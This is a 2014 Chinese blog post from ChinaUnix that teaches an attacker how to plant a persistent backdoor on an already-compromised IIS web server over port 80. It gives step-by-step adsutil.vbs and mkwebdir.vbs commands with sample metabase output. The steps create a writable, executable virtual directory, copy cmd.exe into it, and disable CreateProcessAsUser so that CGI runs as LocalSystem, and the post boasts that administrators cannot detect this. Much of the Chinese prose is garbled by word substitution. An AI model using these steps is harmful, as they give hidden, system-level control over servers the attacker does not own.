Chinaunix首页 | 论坛 | 博客
  • 博客访问: 871
  • 博文数量: 1
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 20
  • 用 户 组: 普通用户
  • 注册时间: 2013-06-21 12:47
文章分类
文章存档

2014年(1)

我的朋友
最近访客

分类: 其他平台

2014-06-06 16:16:48

真正的IIS永远的后门解密





IIS是比较风行的www服务器,设置不当破绽就良多。入侵iis服务器后留下后门,当前就可以随时节制。普通的后门程序都是翻开一个特别的端口来监听,比方有nc,ntlm,rnc等等都是以一品种telnet的方法在服务器端监听远程的衔接把持。不外一个比拟防备周密的www站点他们的管理员吃了苦头后个别通过防火墙对端口进行限度,这样除了管理员开的端口外,其余端口就不能连接了。然而80端口是不可能封闭的如果管理员不吃错药。那么我们可以通过在80端口留后门,来开启永远的后门。

  当IIS启动CGI运用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的平安高低文就由启动该CGI的用户决议。正常匿名用户都映射到IUSR_putername这个账,,当然可以由管理员改为其他的用户。或者由阅读器供给一个正当的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。实在我们可以修改 iis开启CGI的方式,来进步权限。我们来看iis主过程本身是运行在localsystem账,下的,所以我们就可以得到最高localsystem 的权限。

  入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程掌握,比如3389,或者类telnet text方式的控制,好比rnc。nc确定是可以用的,其实这也足够了。

  1. telnet到服务器

  2. cscript.exe adsutil.vbs enum w3svc/1/root

KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认利用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,.,FILE,C:WINNThelpiisHelpmon400.htm"
"401,1,FILE,C:WINNThelpiisHelpmon4011.htm"
"401,2,FILE,C:WINNThelpiisHelpmon4012.htm"
"401,3,FILE,C:WINNThelpiisHelpmon4013.htm"
"401,4,FILE,C:WINNThelpiisHelpmon4014.htm"
"401,5,FILE,C:WINNThelpiisHelpmon4015.htm"
"403,1,FILE,C:WINNThelpiisHelpmon4031.htm"
"403,2,FILE,C:WINNThelpiisHelpmon4032.htm"
"403,3,FILE,C:WINNThelpiisHelpmon4033.htm"
"403,4,FILE,C:WINNThelpiisHelpmon4034.htm"
"403,5,FILE,C:WINNThelpiisHelpmon4035.htm"
"403,6,FILE,C:WINNThelpiisHelpmon4036.htm"
"403,7,FILE,C:WINNThelpiisHelpmon4037.htm"
"403,8,FILE,C:WINNThelpiisHelpmon4038.htm"
"403,9,FILE,C:WINNThelpiisHelpmon4039.htm"
"403,10,FILE,C:WINNThelpiisHelpmon40310.htm"
"403,11,FILE,C:WINNThelpiisHelpmon40311.htm"
"403,12,FILE,C:WINNThelpiisHelpmon40312.htm"

"403,13,FILE,C:WINNThelpiisHelpmon40313.htm"
"403,15,FILE,C:WINNThelpiisHelpmon40315.htm"
"403,16,FILE,C:WINNThelpiisHelpmon40316.htm"
"403,17,FILE,C:WINNThelpiisHelpmon40317.htm"
"404,.,FILE,C:WINNThelpiisHelpmon404b.htm"
"405,.,FILE,C:WINNThelpiisHelpmon405.htm"
"406,.,FILE,C:WINNThelpiisHelpmon406.htm"
"407,.,FILE,C:WINNThelpiisHelpmon407.htm"
"412,.,FILE,C:WINNThelpiisHelpmon412.htm"
"414,.,FILE,C:WINNThelpiisHelpmon414.htm"
"500,12,FILE,C:WINNThelpiisHelpmon50012.htm"
"500,13,FILE,C:WINNThelpiisHelpmon50013.htm"
"500,15,FILE,C:WINNThelpiisHelpmon50015.htm"
"500,100,URL,/iisHelp/mon/500100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:inetpubwwwroot"
AccessFlags : (INTEGER) 513
./w3svc/1/root/localstart.asp.
./w3svc/1/root/_vti_pvt.
./w3svc/1/root/_vti_log.
./w3svc/1/root/_private.
./w3svc/1/root/_vti_txt.
./w3svc/1/root/_vti_script.
./w3svc/1/root/_vti_cnf.
./w3svc/1/root/_vti_bin.

  不要告知我你不晓得上面的输出是什么!!!!

  当初咱们心里已经有底了,是不是!呵呵 治理员要不幸了

  3. mkdir c:inetpubwwwrootdir1
  4. cscript.exe mkwebdir.vbs c MyComputer w "Default Web Site" v "Virtual Dir1","c:inetpubwwwrootdir1"

  这样就建好了一个虚目录:Virtual Dir1

  你可以用 1 的命令看一下

  5. 接下来要转变一下Virtual Dir1的属性为execute

  cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" s:
  cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" s:

  现在你已经可以upload 内容到该目录,并且可以运行。你也能够把cmd.exe net.exe直接拷贝到虚构目录的磁盘目录中。

  6. 以下命令通过修正iis metabase 来迫使iis以自身的保险环境来创立新的CGI process

  Cscript adsutil.vbs set /w3svc/1/root/.your directory./createprocessasuser false

  解释:cscript windows script host.

  adsutil.vbs windows iis administration script

  后面是 iis metabase path

  这样的后门简直是无奈查出来的,除非把所有的虚目录观察一遍假如管理员写好了遗书,那他就去查吧

阅读(393) | 评论(0) | 转发(0) |
0

上一篇:没有了

下一篇:没有了

给主人留下些什么吧!~~
评论热议
请登录后评论。

登录 注册